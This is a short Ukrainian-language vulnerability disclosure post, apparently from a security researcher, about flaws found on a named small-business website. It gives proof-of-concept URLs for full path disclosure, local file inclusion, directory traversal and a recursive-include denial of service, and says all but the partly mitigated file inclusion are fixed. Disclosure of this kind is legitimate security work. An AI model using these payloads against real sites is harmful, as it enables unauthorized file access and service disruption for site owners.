Уразливості на www.paulscomputerservice.net
19:38 02.10.200822.04.2008
У жовтні, 03.10.2007, я знайшов Full path disclosure, Local File Include, Directory Traversal та Denial of Service уразливості на проекті http://www.paulscomputerservice.net. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливості з’явиться пізніше.
02.10.2008
Full path disclosure:
http://www.paulscomputerservice.net/index.php?body=./tutorials/
Local File Include:
http://www.paulscomputerservice.net/index.php?body=support/index.php
Directory Traversal:
http://www.paulscomputerservice.net/index.php?body=../paulscomputerservice.net/robots.txt
DoS (Recursive File Include):
http://www.paulscomputerservice.net/index.php?body=index.php
Дані уразливості вже виправлені, за виключенням Local File Include (можливість використання якого зменшена). LFI можливий лише без Directory Traversal - в папках в корні сайта.